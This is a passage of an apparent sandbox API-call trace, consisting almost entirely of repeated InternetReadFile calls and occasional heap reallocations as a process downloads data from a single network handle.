lpBuffer=0x1d55a08*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.369] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d55df0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d55df0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.369] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d561d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d561d8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.369] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d565c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d565c0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.369] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d569a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d569a8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.369] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d56d90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d56d90*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.370] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d57178, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d57178*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.370] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d57560, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d57560*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.370] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d57948, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d57948*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.370] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d57d30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d57d30*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.370] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d58118, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d58118*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.371] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d58500, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d58500*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.371] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d588e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d588e8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.371] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d58cd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d58cd0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.371] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d590b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d590b8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.371] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d594a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d594a0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.371] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d59888, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d59888*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.372] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d59c70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d59c70*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.372] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d5a058, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d5a058*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.372] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d5a440, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d5a440*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.372] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d5a828, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d5a828*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.373] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d5ac10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d5ac10*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.373] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d5aff8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d5aff8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.373] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x1d5b3e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x1d5b3e0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.373] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0xf000) returned 0x32c0048 [0093.375] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1d54298 | out: hHeap=0x1dc0000) returned 1 [0093.375] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c7578, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c7578*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.375] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c7960, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c7960*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.375] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c7d48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c7d48*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.376] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c8130, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c8130*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.376] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c8518, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c8518*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.376] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c8900, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c8900*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.377] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c8ce8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c8ce8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.377] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c90d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c90d0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.377] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c94b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c94b8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.377] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c98a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c98a0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.377] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32c9c88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32c9c88*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ca070, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ca070*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ca458, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ca458*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ca840, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ca840*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cac28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cac28*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.378] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cb010, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cb010*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cb3f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cb3f8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cb7e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cb7e0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cbbc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cbbc8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.379] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cbfb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cbfb0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.380] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cc398, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cc398*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.380] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cc780, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cc780*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.380] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ccb68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ccb68*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.380] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ccf50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ccf50*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.380] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cd338, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cd338*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.380] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cd720, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cd720*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.381] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cdb08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cdb08*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.381] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32cdef0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32cdef0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.381] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ce2d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ce2d8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.381] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ce6c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ce6c0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.381] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ceaa8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ceaa8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.382] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x16800) returned 0x32cf050 [0093.383] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x32c0048 | out: hHeap=0x1dc0000) returned 1 [0093.383] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32dde98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32dde98*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.383] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32de280, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32de280*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32de668, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32de668*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32dea50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32dea50*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32dee38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32dee38*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32df220, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32df220*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32df608, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32df608*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.385] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32df9f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32df9f0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.385] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32dfdd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32dfdd8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.385] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e01c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e01c0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.385] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e05a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e05a8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.386] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e0990, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e0990*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.386] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e0d78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e0d78*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.386] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e1160, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e1160*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.386] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e1548, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e1548*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.386] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e1930, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e1930*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.387] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e1d18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e1d18*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.387] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e2100, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e2100*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.387] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e24e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e24e8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.405] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e28d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e28d0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.405] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e2cb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e2cb8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.406] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e30a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e30a0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.406] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e3488, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e3488*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.406] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e3870, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e3870*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.406] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e3c58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e3c58*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e4040, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e4040*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e4428, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e4428*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e4810, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e4810*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e4bf8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e4bf8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e4fe0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e4fe0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.407] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32e53c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32e53c8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.408] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x1e000) returned 0x32e5858 [0093.409] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x32cf050 | out: hHeap=0x1dc0000) returned 1 [0093.409] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fbfb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fbfb8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.410] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fc3a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fc3a0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.410] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fc788, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fc788*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.410] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fcb70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fcb70*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.410] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fcf58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fcf58*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.410] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fd340, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fd340*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.410] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fd728, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fd728*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.410] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fdb10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fdb10*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.411] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fdef8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fdef8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.411] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fe2e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fe2e0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.411] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fe6c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fe6c8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.411] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32feab0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32feab0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.411] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fee98, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fee98*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.412] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ff280, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ff280*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.412] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ff668, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ff668*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.412] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ffa50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ffa50*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.412] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32ffe38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32ffe38*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.412] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3300220, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3300220*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.413] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3300608, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3300608*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.413] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33009f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33009f0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.413] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3300dd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3300dd8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.413] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x33011c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x33011c0*, 